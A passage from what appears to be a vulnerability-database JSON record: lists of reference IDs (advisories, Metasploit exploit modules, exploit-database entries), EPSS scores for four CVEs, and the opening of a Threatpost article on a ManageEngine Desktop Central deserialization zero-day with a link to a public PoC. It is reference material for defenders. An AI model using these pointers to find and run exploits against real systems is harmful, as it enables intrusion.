"TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66", "TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:CFBFA4A360F5A4B96A4245B783BAE4C2", "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650", "TALOSBLOG:E7EA34380482751C5595EDE9DA228FA0", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:1BA2E3EE721856ECEE43B825656909B0", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:A30AE10A13D33189456EB192DDF2B8C2", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "threatpost", "idList": ["THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:3D0ED9A884FBC4412C79F4B5FF005376", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:90739FC29BE2A68C72AAA4B88DB9A420", "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:27548"]}, {"type": "zdt", "idList": ["1337DAY-ID-32826", "1337DAY-ID-32978", "1337DAY-ID-33140", "1337DAY-ID-33275", "1337DAY-ID-33565", "1337DAY-ID-34095", "1337DAY-ID-35274", "1337DAY-ID-36351"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "attackerkb", "idList": ["AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:490028", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0657", "CPAI-2019-1097", "CPAI-2020-0118", "CPAI-2020-0872", "CPAI-2020-1095"]}, {"type": "cisa", "idList": ["CISA:2B970469D89016F563E142BE209443D8", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:A5265FFF4C417EB767D82231D2D604B8"]}, {"type": "cve", "idList": ["CVE-2019-0708", "CVE-2019-11510"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "dsquare", "idList": ["E-688"]}, {"type": "exploitdb", "idList": ["EDB-ID:46904", "EDB-ID:47297", "EDB-ID:47416", "EDB-ID:49071"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:BFB36D22F20651C632D25AA20588E904"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0CFAB531-412C-57A0-BD9E-EF072620C078", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "19F70587-89FB-5855-A578-0E55C3510C59", "20466D13-6C5B-5326-9C8B-160E9BE37195", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "2255B39F-1B91-56F4-A323-8704808620D3", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "31DB22CD-3492-524F-9D26-035FC1086A71", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "3F400483-1F7E-5BE5-8612-4D55D450D553", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "462438E9-2947-5006-9134-9BA0BCC1B262", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "49EC151F-12F0-59CF-960C-25BD54F46680", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4E477E4A-4794-5B4A-8706-915B06422C95", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "523F993F-2487-5C75-A910-22605D6D57D9", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "560405C4-4806-5173-B662-F9C3D776D8D4", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "63C36F7A-5F99-5A79-B99F-260360AC237F", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "851959DE-3B5C-5317-868E-5D80E801E3B0", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "939F3BE7-AF69-5351-BD56-12412FA184C5", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9C9BD402-511C-597D-9864-647131FE6647", "9D170C46-A745-5692-BA84-67EBFEA037FF", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A839FA86-0873-592C-AA31-2C445B4C4F29", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BE90B1DD-521D-540C-8554-5454779256A5", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FC661572-B96B-5B2C-B12F-E8D279E189BF", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "hackerone", "idList": ["H1:591295"]}, {"type": "hivepro", "idList": ["HIVEPRO:8DA601C83DB9C139357327C06B06CB36"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS", "HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11706", "KLA11929", "KLA11931"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4482238198881011483", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:C93CCA23099AC250E702848B49677D5B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708"]}, {"type": "mskb", "idList": ["KB4601347"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "mssecure", "idList": ["MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201995523", "MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "REDHAT-RHSA-2020-5439.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153133", "PACKETSTORM:154176", "PACKETSTORM:154579", "PACKETSTORM:160127", "PACKETSTORM:162960"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860"]}, {"type": "redhat", "idList": ["RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1"]}, {"type": "symantec", "idList": ["SMNTC-108273"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "threatpost", "idList": ["THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F60D403369A535076F39A474F74C925E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "zdt", "idList": ["1337DAY-ID-32826"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-0708", "epss": "0.975180000", "percentile": "0.999690000", "modified": "2023-03-16"}, {"cve": "CVE-2019-11510", "epss": "0.975040000", "percentile": "0.999580000", "modified": "2023-03-16"}, {"cve": "CVE-2020-10189", "epss": "0.971730000", "percentile": "0.996340000", "modified": "2023-03-16"}, {"cve": "CVE-2020-1472", "epss": "0.973850000", "percentile": "0.998160000", "modified": "2023-03-16"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1660004461, "score": 1684005285, "epss": 1679050336}, "_internal": {"score_hash": "983b4a63d4c02885147604226b27f4ee"}}

{"threatpost": [{"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a 